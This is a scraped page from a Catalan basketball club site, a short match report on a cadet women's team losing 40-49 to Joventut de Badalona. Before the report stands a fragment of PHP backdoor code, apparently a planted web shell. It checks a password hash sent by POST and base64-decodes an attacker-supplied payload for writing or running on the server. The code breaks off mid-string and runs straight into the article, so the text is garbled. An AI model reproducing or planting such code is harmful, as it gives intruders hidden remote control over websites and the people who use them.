function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 03 A perd el primer partit del curs contra el líder, el Joventut de Badalona (40-49) - Tgn Bàsquet Club -

El cadet femení 03 A perd el primer partit del curs contra el líder, el Joventut de Badalona (40-49)

Updated: desembre 4, 2018

El cadet femení 03 A va perdre el primer partit de la temporada contra el líder, el Joventut de Badalona, que resta imbatut. El conjunt que entrena Manuel Rubio va fer un partit seriós on, després d’alternances en el marcador en el primer quart, les locals van aconseguir un avantatge de sis punts gràcies al seu bon joc. Malgrat tot, les badalonines van aprofitar una davallada del TGN Bàsquet per marxar un punt amunt al descans (23-24). A la represa, la falta d’encert de les liles, amb cap cistella en tirs de camp i només 4 punts de tir lliure (l’estadística en aquest apartat ajuda a entendre la derrota: 8/17 pel TGN Bàsquet i 16/21 pel Joventut), va marcar un punt d’inflexió. La Penya va saber gestionar l’avantatge i va guanyar.